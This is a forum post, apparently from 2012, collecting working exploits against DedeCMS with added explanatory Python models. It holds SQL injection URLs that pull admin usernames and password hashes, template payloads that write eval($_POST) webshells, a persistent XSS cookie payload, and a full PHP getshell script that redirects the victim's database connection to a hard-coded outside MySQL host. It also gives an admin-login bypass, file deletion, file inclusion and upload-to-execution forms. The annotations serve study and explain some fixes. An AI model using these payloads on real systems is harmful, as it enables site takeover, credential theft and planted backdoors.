dedecms vulnerability summary

Posted 2012-10-18 10:42:14 (views: 3014, replies: 0)

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

URL-decoded, the second _Cs key closes the query's parentheses, ANDs in an updatexml() call whose XPath argument is CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) selected from dede_admin, and comments out the rest with #. MySQL quotes the invalid XPath string in its error message, so the response shows [uname:hash]. MID(pwd,4,16) is used because DedeCMS stores the admin password as a 20-character slice of the MD5, and positions 4 to 19 of that slice are the 16-character MD5 (see the password note under the advancedsearch.php section below).

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item with the following in the local address field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line shell with POST parameter (password) xiao: the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
(%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧; the GBK in the heading refers to the site's charset, under which those bytes are regrouped into different double-byte characters.)

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is the URL-encoded #@__ table-prefix placeholder, which DedeCMS expands to the configured prefix, dede_ by default, so the query reads the admin table.)

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and open the URL below; it triggers the XSS and installs the "XSS rootkit". Note that IE8/9 block URL-borne XSS of this kind, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

The String.fromCharCode payload sets a cookie named gotopage holding the same "><script>...</script><x=" string with a one-year expiry; that cookie is what makes the later visits fire.

2. Close the browser. Whichever of the URLs below you open afterwards, the XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
The script posts to /plus/mytag_js.php with _COOKIE[GLOBALS][cfg_db*] overrides that point the target's database connection at a MySQL server on 184.105.174.114 (user exploit, password 90sec, database exploit, prefix dede_). The file it then reports (fuck.php) has to be produced by a {dede:php} tag stored in that database's dede_mytag table, as in the "tag remote file write" section further down; the script itself carries no shell.
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];   // host name of the target
$aid=$argv[2];   // mytag id; selects which directory the shell lands in
$path=$argv[3];  // directory DedeCMS is installed under
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){   // "HTTP/1.1 200 OK" puts OK at offset 13
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// Same fields as the mytag_js.php form further down: doaction plus the
// _COOKIE[GLOBALS][cfg_db*] overrides that redirect the site to the remote MySQL server.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
return '';   // bail out; fwrite()/feof() on a failed handle would spin forever
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;   // only the status line is read; the caller checks it for "OK"
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug with the current CAPTCHA value and you are logged straight into the site's backend. The _POST[GLOBALS][cfg_db*] parameters are the same variable override as the getshell script above: they point the login's database connection at a MySQL server the attacker controls (here 116.255.183.90), so the admin/inimda credentials are checked against that server's admin table rather than the victim's.

Prerequisite: you must already know the backend path (织梦网站后台 in the URL stands for it).

Dedecms (织梦) tag remote file write vulnerability
Prerequisite: set up your own dede database first, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(As posted, the fwrite argument is an empty string; the post does not show what gets written to 1.php.)

Then submit the form below and the shell is 1.php in the same directory. Work out the principle yourself... The dbhost/dbuser/dbpwd/dbname values are placeholders for your own database; doaction is the target's mytag_js.php.
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target URL typed into the doaction field before it is posted.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

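
A model of the variable override (变量覆盖) that the getshell script, the login.php bypass and the mytag_js.php form above all rely on, added here as an example. This is the editor's code, not DedeCMS source: it assumes what the payloads imply, namely a register_globals-style loop that copies every request key into global scope after checking only the top-level key names against ^(cfg_|GLOBALS), and that re-reads each superglobal by name while doing so. Host names, the cookie value and the function names are made up.

```python
"""Why _COOKIE[GLOBALS][cfg_dbhost] slips past a top-level-only ^(cfg_|GLOBALS) filter."""
import re
from urllib.parse import unquote

FILTER_ORIGINAL = re.compile(r"^(cfg_|GLOBALS)")
FILTER_FIXED = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")

# Constructed request body in the shape of the form above (victim host is made up).
PAYLOAD_QS = (
    "doaction=http%3A%2F%2Fvictim.example%2Fplus%2Fmytag_js.php%3Faid%3D1"
    "&_COOKIE[GLOBALS][cfg_dbhost]=attacker-db.example"
    "&_COOKIE[GLOBALS][cfg_dbuser]=exploit"
    "&_COOKIE[GLOBALS][cfg_dbpwd]=secret"
    "&_COOKIE[GLOBALS][cfg_dbname]=exploit"
    "&_COOKIE[GLOBALS][cfg_dbprefix]=dede_"
    "&nocache=true"
)


def php_parse_qs(qs):
    """PHP-style parsing: 'a[b][c]=v&x=1' -> {'a': {'b': {'c': 'v'}}, 'x': '1'}."""
    out = {}
    for pair in filter(None, qs.split("&")):
        key, _, val = pair.partition("=")
        m = re.match(r"([^\[]+)((?:\[[^\]]*\])*)$", unquote(key))
        if not m:
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = out
        for k in path[:-1]:
            node = node.setdefault(k, {})
        node[path[-1]] = unquote(val)
    return out


def check_request(req, flt, recursive=False):
    """Pre-registration filter. The original looked at top-level names only;
    the recursive form also walks into array-valued parameters."""
    for k, v in req.items():
        if flt.match(k):
            raise PermissionError("Request var not allow!")
        if recursive and isinstance(v, dict):
            check_request(v, flt, True)


def register_globals(get, post, cookie, flt, recursive=False):
    """Return the global scope after the registration loop has run."""
    scope = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": dict(cookie)}
    check_request({**scope["_COOKIE"], **scope["_GET"], **scope["_POST"]}, flt, recursive)
    for name in ("_GET", "_POST", "_COOKIE"):
        # $$_request is resolved by name on each round, so once the _POST round has
        # replaced $_COOKIE with the attacker's array, the _COOKIE round iterates that array.
        for k, v in list(scope[name].items()):
            if k == "GLOBALS" and isinstance(v, dict):
                scope.update(v)          # members of the GLOBALS key land in global scope
            else:
                scope[k] = v             # $$k = $v, which includes k == "_COOKIE"
    return scope


def run(flt, recursive=False):
    """Simulate the POST from the form while the browser's real cookie jar is present."""
    post = php_parse_qs(PAYLOAD_QS)
    return register_globals({}, post, {"PHPSESSID": "constructed"}, flt, recursive)


if __name__ == "__main__":
    scope = run(FILTER_ORIGINAL)
    print("cfg_dbhost in global scope:", scope.get("cfg_dbhost"))
    for label, flt, rec in (("fixed regex", FILTER_FIXED, False),
                            ("recursive check", FILTER_ORIGINAL, True)):
        try:
            run(flt, rec)
        except PermissionError as e:
            print(label, "->", e)
```

With the original filter, cfg_dbhost ends up in global scope and the real cookies are gone; either blocking the superglobal names or checking nested keys stops the request.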
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go to the member backend, publish an article and upload an image. Then, in attachment management, replace the image with a crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template contents (if the image format is checked, prefix gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article you just published, view the page source and build a form from it:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Column:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test column</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(these two fields are the crafted part: templet points at the uploaded image and dede_addonfields makes article_edit.php save it)
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if it reports a successful edit, the template path has been changed. 3. Open the edited article:
Assuming the article you just edited has aid 2, you only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory (the template's fopen("1.php") is relative to the directory view.php runs in).

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>

Build the form as above; after the upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows (it sets the article's template to the uploaded GIF, as in the previous section):

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
(dopost=delold removes the file named in oldface; the ../ sequences are not stripped, so the path escapes the member's upload directory.)

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
(The URL is truncated as posted; the traversal sits in the code parameter.)

DedeCms V5.6 plus/advancedsearch.php: reading the admin password from the query above
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving 20 characters. To get the 16-character MD5 from those 20, drop 3 more from the front and 1 from the end.
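
The password layout just described, worked through in code; this also shows why the rss.php payload near the top of this post selects MID(pwd,4,16). It is an example added by the editor, not DedeCMS code: the 20-character layout is the one the post describes (md5 minus the first 5 and last 7 hex digits), the function names are my own, and the word list is constructed.

```python
"""DedeCMS admin password storage: 20-char slice of MD5, and the 16-char MD5 inside it."""
import hashlib


def md5_hex(password):
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_stored_hash(password):
    """The 20-char form kept in dede_admin.pwd: md5 minus the first 5 and last 7 chars."""
    return md5_hex(password)[5:25]


def md5_16_from_stored(stored20):
    """The post's rule: drop 3 more from the front and 1 from the end -> 16-char MD5."""
    if len(stored20) != 20:
        raise ValueError("expected the 20-character stored hash")
    return stored20[3:19]


def mysql_mid(s, pos, length):
    """MySQL MID(str, pos, len) with 1-based pos; MID(pwd,4,16) is the same 16-char slice."""
    return s[pos - 1:pos - 1 + length]


def crack_stored_hash(stored20, candidates):
    """Offline check of a leaked 20-char hash against a candidate list; None if no hit."""
    for word in candidates:
        if dede_stored_hash(word) == stored20:
            return word
    return None


if __name__ == "__main__":
    stored = dede_stored_hash("admin")
    print("stored:", stored)                        # f297a57a5a743894a0e4
    print("16-char md5:", md5_16_from_stored(stored))
    print("MID(pwd,4,16):", mysql_mid(stored, 4, 16))
    print("cracked:", crack_stored_hash(stored, ["123456", "admin", "password"]))
```

The 16 characters recovered either way are positions 8 to 23 of the full MD5, i.e. the common "16-bit MD5" that rainbow tables are built for, which is why the injection extracts exactly that slice.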
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL error raised by a numeric overflow in a field value, together with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Open:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Open
http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
(int(3) is the output of the injected var_dump(3): the mid value closed the comment the log file wraps its entries in, so what was logged after it runs as PHP, and the text after the injected ?> is printed verbatim.)

3. Run test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking confirm, seeing the step-2 output again means the trojan is in place.
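
The log-injection pattern behind mysql_error_trace.php, modelled as an example added by the editor; it is not DedeCMS code. The post shows only the tail of the log file ("*/ ?>"), so the wrapper format below is an assumption: a .php file that hides its entries inside one block comment. The first entry is constructed to carry the mid value from step 1 (which query it really lands in is not shown); the second is the entry the post shows in step 2.

```python
"""Vulnerable vs hardened writer for a PHP-wrapped error log, plus a scanner that shows
what PHP would execute from each."""

PHP_HEAD = "<?php /*\n"
PHP_TAIL = "*/ ?>"

SAMPLE_ENTRIES = [  # constructed; (message, sql)
    ("Illegal double '1024e1024' value found during parsing",
     "Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 "
     "and mid=*/eval($_POST[x]);var_dump(3);?> limit 0,1"),
    ("Illegal double '1024e1024' value found during parsing",
     "Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1"),
]


def render_entry(msg, sql):
    return f"Error: {msg}\nError sql: {sql};\n"


def write_trace_vulnerable(entries):
    """Raw error text, attacker-controlled SQL included, straight into the comment."""
    return PHP_HEAD + "".join(render_entry(m, s) for m, s in entries) + PHP_TAIL


def neutralise(s):
    """Break the two tokens that can end the comment or the PHP block."""
    return s.replace("*/", "* /").replace("?>", "? >")


def write_trace_hardened(entries):
    """Same layout with the terminators neutralised. Logging to a non-PHP file outside
    the web root removes the problem altogether."""
    return PHP_HEAD + "".join(render_entry(neutralise(m), neutralise(s)) for m, s in entries) + PHP_TAIL


def php_scan(src):
    """Minimal PHP lexer: returns (code, literal). code = statements PHP would execute
    (inside <?php ... ?>, outside /* */); literal = text outside PHP mode echoed verbatim."""
    code, literal, i, in_php = [], [], 0, False
    while i < len(src):
        if not in_php:
            j = src.find("<?php", i)
            if j < 0:
                literal.append(src[i:])
                break
            literal.append(src[i:j])
            i, in_php = j + 5, True
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            i = len(src) if j < 0 else j + 2
        elif src.startswith("?>", i):
            i, in_php = i + 2, False
        else:
            stops = [x for x in (src.find("/*", i), src.find("?>", i)) if x >= 0]
            j = min(stops) if stops else len(src)
            code.append(src[i:j])
            i = j
    return "".join(code).strip(), "".join(literal)


if __name__ == "__main__":
    for label, writer in (("vulnerable", write_trace_vulnerable), ("hardened", write_trace_hardened)):
        code, literal = php_scan(writer(SAMPLE_ENTRIES))
        print(f"{label}: executes {code!r}")
        print(f"{label}: echoes   {literal!r}")
```

On the vulnerable file the scanner returns eval($_POST[x]);var_dump(3); as executable code and the remainder, ending in */ ?>, as literal output, which is the shape of the page shown in step 2; on the hardened file it returns nothing for either.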
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
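
The wide-byte quote escaping behind the %cf' prefix in the infosearch.php URL above, and the reason the multibyte characters appear in the "Dede 5.6 GBK SQL injection" URLs earlier in this post. This is an example added by the editor, not from the post: PHP's addslashes() is re-implemented byte for byte to show what a GBK connection sees after escaping, and the safer charset-aware variant is my own.

```python
"""Wide-byte escape bypass: a lead byte absorbs the 0x5C that addslashes() inserted."""


def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): backslash before ' " \\ and NUL, byte-wise and charset-unaware."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_seen_by_gbk_server(payload: bytes) -> str:
    """Escape as PHP would, then decode the way a GBK connection decodes the query."""
    return addslashes(payload).decode("gbk", errors="replace")


def backslash_swallowed(payload: bytes) -> bool:
    """True when the escape byte became the trail byte of a GBK character,
    leaving a bare quote in the SQL."""
    seen = as_seen_by_gbk_server(payload)
    return "'" in seen and "\\'" not in seen


def escape_with_charset(payload: bytes, charset: str) -> str:
    """Charset-aware handling: decode in the connection charset first (strict), escape in
    the resulting text, and let a dangling lead byte fail instead of slipping through."""
    text = payload.decode(charset)   # raises UnicodeDecodeError on 0xBF followed by 0x27
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    for sample in (b"\xcf'", b"\xbf'", b"abc'", "涛".encode("gbk") + b"'"):
        print(sample, "->", repr(as_seen_by_gbk_server(sample)),
              "swallowed" if backslash_swallowed(sample) else "escaped")
```

0xCF 0x5C and 0xBF 0x5C are both valid GBK double-byte characters, so the server's parser consumes the backslash as part of the character and the quote that follows terminates the string. Parameterised queries, or escaping only after decoding in the connection's charset as escape_with_charset does, remove the mismatch.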